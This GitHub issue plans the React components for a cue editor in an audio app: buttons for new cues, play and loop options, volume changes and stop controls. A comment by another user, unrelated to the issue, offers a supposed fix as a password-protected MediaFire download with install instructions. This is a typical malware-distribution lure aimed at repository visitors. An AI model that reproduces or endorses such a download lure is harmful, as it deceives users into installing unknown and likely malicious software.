### ISSUE TITLE
Create Cue Editor Components

### ISSUE THREAD

**Issue by lkcina** [lkcina/qsound#10]
## Window
Cue Editor

## Description
The cue editor needs an interface made up of React components:

- New Cue Change Button
  * Only Present in Create Mode
  * Maybe located in toolbar or upper corner?
- Cue
  * Target and Function Selector
    - New Cue
      * Select Audio File
      * Start
        - Play
          * Event Trigger
          *Delay
          * Start
            - Time
          * End
            - Time
        - Loop
          * Event Trigger
          * Delay
          * Start
            - Time
          * End
        - Play Loop
          * Event Trigger
          * Delay
          * Start
            - Time
          * Loop Start
          * End
      * Change (
        - Adjust Volume
          * Event Trigger
          * Delay
          * Final Value
          * Time
       * Stop
          * Event Trigger
          * Delay
          * Time
    - Delete Button

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
